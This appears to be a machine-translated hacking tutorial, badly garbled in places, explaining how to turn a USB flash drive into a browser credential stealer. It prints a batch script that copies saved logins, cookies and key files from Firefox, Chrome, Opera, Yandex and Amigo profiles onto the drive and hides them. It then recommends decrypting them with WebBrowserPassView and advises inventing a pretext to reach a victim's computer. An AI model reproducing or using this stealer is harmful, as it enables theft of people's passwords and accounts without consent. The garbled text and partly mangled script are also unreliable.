A regular USB flash drive, what’s dangerous about it? Many do not know, and it can be used for selfish purposes. It’s time to tell how to turn, at first glance, harmless flash drive into a cookie styler.
Stiller steals cookies from your browser and uses a special program to decrypt them. At the output you get ready-made passwords. For those in the bunker: cookies – encrypted text documents that store basic information about the user who sends the browser. This information includes statistics on browser usage, personal settings, saved logins and passwords, and much more.
Pluses and minuses of the method
- It makes sense to steal cookies only when you are sure that the victim saves passwords in the browser.
- Compatibility with WINDOWS 10, and latest versions of the seven
- The method is not scorched by antivirus.
- Whoever’s talking and hacking a man is easier than a computer. The pretext could be the sea. Ask a friend to come to him with a flash drive, and download music and so on.
When it’s time to do it
We create 2 text files on a flash drive. The first is called “autorun.inf” and the second is called “stealer.bat” *.bat – the executable file extension. That is, it can be used as a program*.
In the first line we write such lines:
The first file is responsible for the autostart of the styler. The second file is directly the styler. It should be filled with such lines:.
@echo off md %~d0\Mozilla md %~d0\0pera md %~d0\Google md %~d0\Yandex md %~d0\Amigo CD/D %APPDATA%\Opera\Opera\ cls copy /y wand.dat %~d0\Opera\ copy /y cookies.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default cls copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google". cd %localappdata%\Yandex\YandexBrowser\User Data\Default. copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex". cd %localappdata%\Amigo\User Data\Default. copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo". cls ATTRIB -R -A -S -H attrib +h %~d0\Mozilla attrib +h %~d0\Opera attrib +h %~d0\Google attrib +h %~d0\Yandex attrib +h %~d0\Amigo attrib +h %~d0\search.bat attrib +h %~d0\new attrib +h %~d0\autorun.inf del: autorun.inf?
After that, “hide” the resulting files, and we can go styling passwords, and after the operation is successful – go home, through the “Control Panel->Design and personalization->Show hidden folders and files” displays hidden files on a flash drive.
You can delete your cookies on your computer, or drop them on a flash drive. And in their place we copy the received cookies.
Now we download WebBrowserPassView. Personally, I used the portable version. In this program you do not need to click anything – it will download and decrypt the cookies from your browsers. Remember, do not forget to replace your files with the received ones!
Returning to the disadvantages described above, you should decide which way to use the stilting. If the victim has the latest version of the winds of the seven, or even a dozen, then the best way to stilting is by hand. That is, it is necessary to come to the victim’s house, naturally inventing an excuse in advance, connect the flash drive to the PC, and run the stilting manually.